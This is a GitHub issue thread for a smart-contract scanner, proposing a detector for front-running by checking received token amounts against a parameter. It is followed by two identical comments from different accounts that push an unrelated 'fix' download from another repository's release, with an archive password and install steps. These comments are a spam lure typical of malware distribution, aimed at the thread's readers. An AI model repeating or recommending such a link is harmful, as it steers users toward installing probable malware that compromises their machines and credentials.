### ISSUE TITLE
Front running detector

### ISSUE THREAD

**Issue by matiascabello** [CoinFabrik/scout-soroban#342]
**First iteration**

Check that when a transfer is done, the received amount is compared with a parameter passed to the function. The amount of tokens received should be greater or equal to the parameter value.

**Second iteration**

Compare the received token amount with a parameter that is either directly obtained from the blockchain state or calculated using a value derived from the blockchain state.

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
